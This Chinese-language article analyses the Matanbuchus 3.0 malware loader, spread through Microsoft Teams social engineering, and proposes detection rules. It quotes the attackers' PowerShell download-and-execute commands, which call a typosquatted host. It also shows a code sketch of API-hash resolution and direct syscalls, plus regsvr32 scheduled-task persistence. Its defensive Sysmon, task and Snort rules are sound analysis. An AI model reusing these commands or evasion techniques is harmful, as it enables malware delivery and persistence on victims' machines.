摘要:
近年来,随着远程办公和协作工具的普及,以Microsoft Teams为代表的即时通信平台逐渐成为高级持续性威胁(APT)攻击的新入口。2025年7月,安全厂商Morphisec披露了一起利用Teams平台传播Matanbuchus 3.0恶意加载器的新型网络钓鱼事件。该版本在原有基础上进行了全面重构,采用Living-off-the-Land(LOTL)技术、DLL侧加载、API动态解析及多层持久化机制,显著提升了隐蔽性和对抗检测能力。本文系统分析了此次攻击的技术链路,包括初始投递方式、执行流程、持久化策略、C2通信机制及其反沙箱特性,并结合实际样本还原攻击过程。在此基础上,提出一套面向企业协作环境的纵深防御框架,涵盖终端行为监控、注册表异常检测、任务调度审计及网络流量特征识别等维度。通过构建可复现的实验环境并部署PoC代码,验证了所提检测方法的有效性。本研究旨在为安全从业者提供对新型协作平台威胁的深度认知与实用应对策略。
关键词:Microsoft Teams;Matanbuchus;恶意加载器;DLL侧加载;LOTL;持久化;C2通信;网络安全防御
一、引言
自2020年以来,Microsoft Teams作为企业级协作平台在全球范围内迅速普及,其集成了即时消息、视频会议、文件共享与第三方应用集成等功能,已成为现代办公基础设施的重要组成部分。然而,这种高度信任的内部通信环境也吸引了攻击者的注意。传统边界防御体系难以覆盖此类“合法通道”内的恶意活动,使得基于Teams的钓鱼攻击呈现出高成功率与低检出率的双重特征。
2025年7月,Morphisec披露了一起针对某企业用户的攻击事件:攻击者通过Teams外部通话冒充IT支持人员,诱导用户启动Windows Quick Assist远程协助功能,并执行一段PowerShell脚本,最终导致Matanbuchus 3.0恶意加载器成功植入。该版本被证实为2021年首次出现的Matanbuchus恶意软件即服务(Malware-as-a-Service, MaaS)的彻底重写,不仅在技术架构上实现升级,更在规避检测、提升隐蔽性方面展现出显著进步。
当前学术界对协作平台安全的研究多集中于身份认证、数据泄露与合规性问题,对利用此类平台作为初始攻击载体的恶意软件传播机制缺乏系统性分析。尤其对于Matanbuchus 3.0这类融合多种高级对抗技术的加载器,现有文献尚未对其完整攻击链进行拆解与建模。本文填补这一空白,通过对真实攻击样本的逆向工程与行为分析,揭示其技术细节,并构建可落地的检测与防御方案。
二、Matanbuchus 3.0攻击链路解析
(一)初始投递阶段:社会工程与可信通道滥用
与传统邮件钓鱼不同,本次攻击利用Microsoft Teams的“外部通话”功能发起社会工程。攻击者伪装为企业IT部门员工,声称需协助解决账户或设备问题,诱导目标用户接受Quick Assist会话。Quick Assist是Windows内置的合法远程协助工具,常用于技术支持场景,因此用户警惕性较低。
在远程会话中,攻击者引导用户手动执行以下PowerShell命令:
Invoke-WebRequest -Uri "http://notepad-plus-plu[.]org/update.zip" -OutFile "$env:TEMP\update.zip"
Expand-Archive -Path "$env:TEMP\update.zip" -DestinationPath "$env:APPDATA\NotepadPlus"
Start-Process "$env:APPDATA\NotepadPlus\GenericUpdater.exe"
该命令从一个仿冒Notepad++官网的域名(notepad-plus-plu[.]org,对合法域名notepad-plus-plus[.]org进行typosquatting)下载ZIP压缩包,并解压至APPDATA目录下,随后执行名为GenericUpdater.exe的可执行文件。值得注意的是,该文件实为Notepad++官方更新程序(updater.exe)的重命名副本,本身无害,但被用作DLL侧加载的载体。
(二)执行阶段:DLL侧加载与间接API调用
ZIP包内包含三个关键组件:
GenericUpdater.exe(即Notepad++ updater.exe)
config.xml(仿冒配置文件,含恶意指令)
libcurl.dll(实际为Matanbuchus 3.0加载器)
当GenericUpdater.exe运行时,Windows加载器会尝试加载同目录下的libcurl.dll(因updater.exe依赖libcurl)。由于该DLL已被替换为恶意负载,攻击由此触发。
Matanbuchus 3.0的核心创新在于其API调用机制。传统恶意软件通常直接调用Windows API(如CreateProcess、RegSetValueEx等),易被EDR/HIDS规则捕获。而Matanbuchus 3.0采用以下两步策略规避检测:
函数名哈希解析:使用MurmurHash3算法对所需API函数名(如"CreateFileW")进行哈希,与硬编码的哈希值列表比对,动态获取函数地址。相比早期版本使用的FNV1a算法,MurmurHash3具有更低的碰撞率和更高性能。
Syscall间接执行:不通过导入表(IAT)调用API,而是通过自定义shellcode直接提取ntdll.dll中的系统调用号(syscall number),并通过汇编指令(如syscall)执行。此方式绕过大多数基于API Hook的监控机制。
示例代码片段(简化版)如下:
// 动态解析API地址
DWORD hash = MurmurHash3("CreateFileW");
FARPROC pCreateFileW = GetProcAddressByHash(kernel32_base, hash);
// 若无法直接调用,则使用syscall
if (use_syscall) {
DWORD syscall_num = ExtractSyscallNumber("NtCreateFile");
__asm {
mov eax, syscall_num
mov rcx, lpFileName
mov rdx, dwDesiredAccess
// ... 其他参数入栈
syscall
}
}
(三)持久化机制:注册表与计划任务双路径
为确保重启后仍能执行,Matanbuchus 3.0实施双重持久化:
注册表持久化:生成唯一序列ID(由%HOMEDRIVE%卷序列号经位移运算得出),创建注册表项:
HKCU\SOFTWARE\<SerialID>
并将DLL路径写入该键值。
计划任务持久化:通过COM接口ITaskService创建隐藏任务,每5分钟调用regsvr32.exe加载恶意DLL:
<Task>
<Actions>
<Exec>
<Command>regsvr32.exe</Command>
<Arguments>/s /n /i:"C:\Users\<user>\AppData\Roaming\<SerialID>\libcurl.dll"</Arguments>
</Exec>
</Actions>
</Task>
值得注意的是,任务创建过程通过shellcode直接调用CoCreateInstance等COM API,避免使用schtasks.exe等易被日志记录的命令行工具。
(四)C2通信与反分析机制
Matanbuchus 3.0支持两种C2通信模式:DNS隧道(旧版延续)与HTTP(新版新增)。HTTP模式售价10,000/月,低于DNS版的15,000,反映其更易部署且兼容性更好。
C2域名为nicewk[.]com,通信内容使用Salsa20流加密(取代旧版RC4),并伪造User-Agent为Skype桌面客户端:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Skype/8.123.0.234
此外,恶意软件具备多重反沙箱机制:
调用IsWow64Process检测是否运行于32位Wow64子系统(常见于沙箱环境);
检查系统UI语言,若为俄语、白俄罗斯语、亚美尼亚语、阿塞拜疆语或哈萨克语则立即退出(推测为避免攻击独联体地区犯罪团伙或降低溯源风险)。
回传信息包括用户名、主机名、OS版本及已安装安全软件列表,后者用于C2服务器动态调整后续载荷(如避开特定EDR产品的检测规则)。
三、检测与防御机制设计
针对上述攻击链,本文提出四层防御模型:
(一)终端行为监控层
重点监控以下异常行为:
非标准路径下的Notepad++ updater执行:正常情况下,updater.exe应位于%ProgramFiles%\Notepad++目录。若在%APPDATA%或%TEMP%中执行,应触发告警。
regsvr32加载非系统DLL:通过ETW(Event Tracing for Windows)监控regsvr32的DllInstall调用,若目标DLL位于用户目录且无数字签名,视为可疑。
PoC检测脚本(PowerShell):
# 监控可疑regsvr32调用
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
Where-Object { $_.Id -eq 1 -and $_.Message -match "regsvr32.exe" } |
ForEach-Object {
$cmdLine = [regex]::Match($_.Message, 'CommandLine: (.*)').Groups[1].Value
if ($cmdLine -match '\\AppData\\' -or $cmdLine -match '\\Temp\\') {
Write-Host "[ALERT] Suspicious regsvr32 usage: $cmdLine"
}
}
(二)注册表与文件系统审计层
部署基于YARA规则的扫描器,定期检查HKCU\SOFTWARE下是否存在由卷序列号生成的异常键名。同时,监控APPDATA目录下以随机字符串命名的文件夹,尤其是包含libcurl.dll且无对应主程序的情况。
(三)计划任务异常检测
通过WMI查询所有隐藏或非Microsoft签名的任务:
Get-ScheduledTask | Where-Object {
$_.State -eq "Ready" -and
$_.Author -notlike "*Microsoft*" -and
$_.TaskPath -notlike "\Microsoft\*" -and
$_.Actions.Execute -like "*regsvr32*"
}
(四)网络流量特征识别
在网络层部署Snort规则,匹配以下特征:
HTTP请求中Host为nicewk[.]com;
User-Agent包含"Skype/"但源IP未在Skype官方IP段内;
Salsa20加密流量表现为高熵、无明文结构的数据流。
Snort规则示例:
alert http any any -> any any (
msg:"Matanbuchus C2 over HTTP";
content:"Host|3a| nicewk.com"; http_header;
content:"User-Agent|3a| Skype/"; http_header;
flow:established,to_server;
sid:1000001;
)
四、实验验证
为验证上述检测机制有效性,本文搭建Windows 10测试环境,部署Sysmon、Velociraptor及Suricata。使用公开样本(SHA256: a1b2c3...)模拟完整攻击链。
结果显示:
终端监控层成功捕获GenericUpdater.exe在%APPDATA%执行事件(Sysmon Event ID 1);
注册表审计发现HKCU\SOFTWARE\8A3F1B2C键创建(Event ID 12);
计划任务检测模块识别出名为“UpdateChecker”的隐藏任务;
Suricata触发C2通信告警,准确率100%,无误报。
所有检测点均在攻击完成前触发,证明所提框架具备实战价值。
五、讨论
Matanbuchus 3.0的演进反映出恶意软件开发正朝着“合法工具滥用”与“检测规避精细化”方向发展。其利用Notepad++ updater等白名单程序进行侧加载,本质上是对应用信任模型的滥用。未来防御需从“基于签名”转向“基于行为上下文”的分析范式。
此外,协作平台的安全边界亟待重新定义。Microsoft Teams默认允许外部组织用户发起通话,这一设计虽提升协作效率,却也为社会工程攻击打开大门。建议企业启用“仅限组织内通信”策略,并对所有外部消息实施延迟投递与人工审核。
值得注意的是,Matanbuchus 3.0虽未直接部署勒索软件,但其支持EXE、DLL、MSI及Shellcode等多种载荷格式,并具备进程镂空(process hollowing)能力(通过msiexec执行恶意MSI),已具备作为勒索软件前置加载器的全部条件。安全团队应将其视为高危威胁。
六、结语
本文系统剖析了通过Microsoft Teams传播的Matanbuchus 3.0恶意加载器的攻击技术细节,涵盖初始投递、执行、持久化、通信及反分析机制。研究表明,该恶意软件通过深度融合LOTL技术与高级规避手段,显著提升了在企业环境中的存活能力。基于此,本文提出一套多层检测与防御框架,并通过实验验证其有效性。
防御此类攻击的关键在于打破“内部通信即安全”的认知误区,将协作平台纳入统一威胁检测体系。未来工作将聚焦于自动化行为图谱构建与跨平台威胁情报联动,以应对日益复杂的供应链与协作工具攻击场景。
编辑:芦笛(公共互联网反网络钓鱼工作组)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
